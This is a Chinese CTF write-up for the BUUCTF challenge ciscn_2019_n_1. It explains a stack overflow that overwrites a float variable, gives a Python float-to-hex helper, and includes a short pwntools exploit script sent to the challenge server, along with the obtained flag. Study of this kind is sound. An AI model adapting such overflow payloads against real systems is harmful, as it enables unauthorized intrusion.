pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
JWASX25 分钟前
Java 转 go 学习 - kitex(5)
学习·golang
AOI小白新手上路39 分钟前
VDMamba·AutoDL 复现笔记 · 学习笔记
笔记·学习
~kiss~40 分钟前
LangGraph ~ 为图添加跨线程持久化
学习
xianrenli382 小时前
水肺潜水学习
学习
凌云若寒3 小时前
BarTender提示#807错误:无法在拥有其他许可证的Licensing Service上激活节点锁定的 Professional 版许可证 的解决办法
运维·服务器·前端·学习·软件需求
爱吃苹果的日记本4 小时前
离散数学第七课
学习·离散数学
迪丽热爱4 小时前
多媒体应用31-914(计算机硬件与体系结构)
学习
dadaobusi4 小时前
学习:BPU
学习
ab1237685 小时前
OpenCV 学习笔记
笔记·opencv·学习
磁场转动100万匹5 小时前
Hive 学习第一天:搞懂它是什么,并搭好可用的环境
hive·hadoop·学习